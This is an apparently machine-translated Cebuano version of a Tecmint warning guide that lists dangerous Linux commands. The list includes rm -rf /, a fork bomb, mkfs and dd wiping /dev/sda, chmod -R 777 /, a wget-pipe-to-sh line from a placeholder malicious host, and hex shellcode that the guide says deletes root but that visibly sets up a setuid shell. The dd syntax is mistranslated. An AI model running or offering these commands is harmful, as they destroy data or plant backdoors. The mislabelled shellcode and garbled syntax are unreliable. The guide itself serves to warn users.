Labing Delikado nga mga Sugo - Dili Nimo Kinahanglang Ipatuman sa Linux


Ang interface sa command-line usa ka gamhanan ug magamit nga gamit alang sa pagdumala sa usa ka sistema sa Linux. Naghatag kini usa ka paspas ug daghag gamit nga paagi sa pagpadagan sa sistema, labi na kung nagdumala sa mga sistema nga wala’y ulo nga wala’y graphical interface.

Samtang mapuslanon sa pagdumala sa imong sistema, ang command line puno sa mga risgo. Ang pagpadagan sa dili maayo nga mga sugo mahimong hinungdan sa kadaot ug dili na mabawi nga kadaot sa imong sistema. Sa kini nga giya, nag-compile kami usa ka lista sa pipila nga labing peligro nga mga mando nga dili nimo kinahanglan hunahunaon nga ipatuman sa imong sistema.

1. rm -rf/Sugo

Ang rm command usa ka Linux command nga gigamit sa pagtangtang sa mga file ug mga direktoryo depende sa mga argumento nga gigamit. Bisan pa, kinahanglan nga mag-amping pag-ayo kung gamiton ang rm command ingon usa ka gamay nga typo o sayup nga mahimong moresulta sa dili mabawi nga kadaot sa sistema.

Kung gi-execute isip gamut gamit ang -rf / option, ang command recursively delete sa tanang file ug directory sa imong system sugod sa root (/) nga mao ang pinakataas sa Linux Istruktura sa File Hierarchy. Sa laktod nga pagkasulti, ang rm -rf / nga sugo hingpit nga mapapas ang imong sistema nga moresulta sa pagkaguba ug dili na mabawi nga sistema.

Ang pipila sa mga kapilian nga gigamit sa rm command mao ang.

    Ang
  • rm command sa Linux gigamit sa pagtangtang sa mga file.
  • Ang
  • rm -r command nagtangtang sa folder nga balikbalik, bisan ang walay sulod nga folder.
  • rm -f command nagtangtang sa 'Read only File' nga walay pangutana.
  • rm -rf/: Puwersa nga tangtangon ang tanan sa root directory.
  • rm -rf * : Puwersa nga tangtangon ang tanan sa kasamtangang direktoryo/nagtrabaho nga direktoryo.
  • rm -rf . : Puwersa ang pagtangtang sa kasamtangang folder ug mga subfolder.

Sa tinuud, kung gipadagan nimo ang mando ingon usa ka regular nga tiggamit, makakuha ka duha nga pasidaan sa terminal.

Aron mabuntog ang aksidenteng pagtangtang sa mga file pinaagi sa 'rm' nga sugo, paghimo og alias sa 'rm' nga sugo isip 'rm -i' sa \.bashrc file, kini mangutana kanimo sa pagkumpirma sa matag pagtangtang.

2. :(){:|:&};: Sugo

Ang labaw sa tinuod usa ka fork bomb. Naglihok kini pinaagi sa paghimo og function nga gitawag og :, nga nagtawag sa iyang kaugalingon kaduha, kausa sa foreground ug kausa sa background. Ang function balik-balik nga gipatuman ug sa pagbuhat niini, gigamit ang tanan nga mga kapanguhaan sa sistema nga nagresulta sa pagkahagsa sa sistema.

Sa tinuud, ang usa ka command sa fork bomb usa ka porma sa pag-atake sa DoS (Denial-of-Service). Gitawag usab kini nga Wabbit o Rabbit virus. Ang pinakagrabe nga bahin mao nga dili nimo kinahanglan nga gamut aron ilunsad kini nga pag-atake.

Maayo na lang, mahimo nimong panalipdan ang imong kaugalingon gikan sa kini nga pag-atake pinaagi sa paglimit sa gidaghanon sa mga proseso nga gipadagan sa mga lokal nga tiggamit sa hapit 4000.

Mahimo nimo kini pinaagi sa pagpadagan sa mando:

$ ulimit -S -u 4000

Mahimo nimong susihon kini sa ulahi gamit ang mando:

$ ulimit -u

3. sugo > /dev/sda

Ang pagpadagan sa sugo nga gisundan sa >/dev/sda mo-overwrite sa /dev/sda block sa imong hard drive. Kini nga block naglangkob sa data sa filesystem ug kung gi-overwrite, moresulta sa usa ka nadaot nga sistema nga dili na mabawi.

4. mv folder/dev/null

Laing makadaot nga operasyon nga dili nimo kinahanglan sulayan mao ang pagbalhin sa usa ka direktoryo o file sa /dev/null. Ang /dev/null nga payl usa ka espesyal nga tipo sa payl nga nailhan nga null device o “the black hole“. Ang bisan unsang butang nga ibalhin sa /dev/null ilabay ug laglagon.

Ang mosunod nga sugo nagpalihok sa tanang sulod sa home directory sa user ngadto sa /dev/null, sa ingon gilabay ang tanang data nga anaa sa home directory sa user.

# mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

Ang wget command usa ka sugo nga nag-download sa mga file gikan sa web o file server. Ang sugo sa ibabaw nag-download sa usa ka script gikan sa usa ka malisyosong tinubdan ug dayon ipatuman kini.

6. mkfs.ext3 /dev/sda

Ang mkfs command nagmugna og bag-ong filesystem (bisan ext2, ext3, ext4, etc) sa usa ka formatted storage device, sa kasagaran usa ka partition sa hard disk drive. Ang pagpadagan sa mkfs command sa usa ka partisyon mopahid sa tanang datos nga gitipigan niini.

Samtang mapuslanon sa pag-format sa mga partisyon sa disk, ang pag-format sa tibuok drive (sama sa mkfs.ext3 /dev/sda) maka-crash sa sistema ug magbilin niini sa dili na mabawi nga kahimtang. Nahitabo kini tungod kay giguba niini ang tanan nga mga file sa sistema kauban ang imong personal nga datos.

Ang mando mahimo usab nga magkuha sa ubang mga porma sama sa gipakita sa ubos.

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. > file Command

Ang > nga payl magwagtang sa sulod sa usa ka file ug magbilin niini nga blangko. Kini susama sa cat /dev/null> file command. Busa kinahanglan nga mag-amping kung gamiton ang mga operator sa pag-redirect sa usa ka sistema sa Linux.

Sa ubos usa ka demonstrasyon kung giunsa kini nga mando nag-overwrite sa usa ka text file. Mahimo nimong mahanduraw ang katalagman nga ipahinabo sa kini nga mando kung ang file nga nahilambigit usa ka file sa pag-configure.

8. ^foo^bar

Ang ^foo^bar nga sugo sama ka delikado kay kini mapuslanon depende kung giunsa kini pagpatuman. Samtang gitugotan ka niini nga i-edit ang mga nauna nga gipatuman nga mga mando ug ipatuman kini pag-usab, mahimo’g makadaot kung dili ka gusto sa mga pagbag-o nga gihimo sa mga mando sa wala pa kini ipadagan.

9. dd kon=/dev/random sa=/dev/sda

Ang sugo sa ibabaw nagwagtang sa/dev/sda block ug nagsulat ug random junk data sa block. Ang imong sistema mabiyaan sa usa ka dili managsama ug dili mabawi nga yugto.

10. Chmod -R 777 /

Samtang dili dayon kini maka-crash sa imong Linux system, ang chmod -R 777 / command recursively assign sa tanang permiso (basaha, isulat ug i-execute) sa tanang file sa imong Linux system sugod sa gamut.

Kini epektibo nga nagpadayag sa tanan nga kritikal nga mga file sa pag-configure ug uban pang mga file sa tanan nga mga tiggamit ug kini nagbutang usa ka dako nga peligro sa seguridad sa imong sistema. Bisan kinsa nga adunay daotan nga mga katuyoan mahimo’g mag-usik sa hinungdanon nga mga file ug dali nga makaguba sa imong sistema.

11. Ang Tinago nga Sugo

Ang ubos nga sugo walay lain kondili ang unang sugo sa ibabaw (rm -rf). Dinhi ang mga code gitago sa hex aron ang usa ka ignorante nga tiggamit mahimong malimbongan. Ang pagpadagan sa ubos nga code sa imong terminal magpahid sa imong root partition.

Kini nga sugo dinhi nagpakita nga ang hulga mahimong gitago ug dili kasagarang mamatikdan usahay. Kinahanglan nga nahibal-an nimo kung unsa ang imong gibuhat ug kung unsa ang mahimong resulta. Ayaw pag-compile/pagdagan mga code gikan sa wala mailhi nga gigikanan.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Mubo nga sulat: Ayaw ipatuman ang bisan unsang mga sugo sa ibabaw sa imong Linux terminal o shell o sa imong higala o kompyuter sa eskwelahan. Kung gusto nimo sulayan kini, padagana kini sa usa ka virtual machine.

Ang bisan unsang pagkasumpaki o pagkawala sa datos, tungod sa pagpatuman sa naa sa taas nga mando makaguba sa imong sistema diin, dili ang Awtor sa artikulo o ang Tecmint ang responsable.

Kana lang sa pagkakaron. Mobalik na usab ako dinhi uban ang laing makapaikag nga artikulo nga ganahan ninyong basahon. Hangtud unya Magpabilin nga tuned ug konektado sa Tecmint.

Kung nahibal-an nimo ang bisan unsang uban nga mga Dangerous Linux Commands ug gusto nimo nga idugang namon kini sa lista, palihug sultihi kami pinaagi sa seksyon sa komento, ug ayaw kalimti ang paghatag sa imong bililhon nga feedback.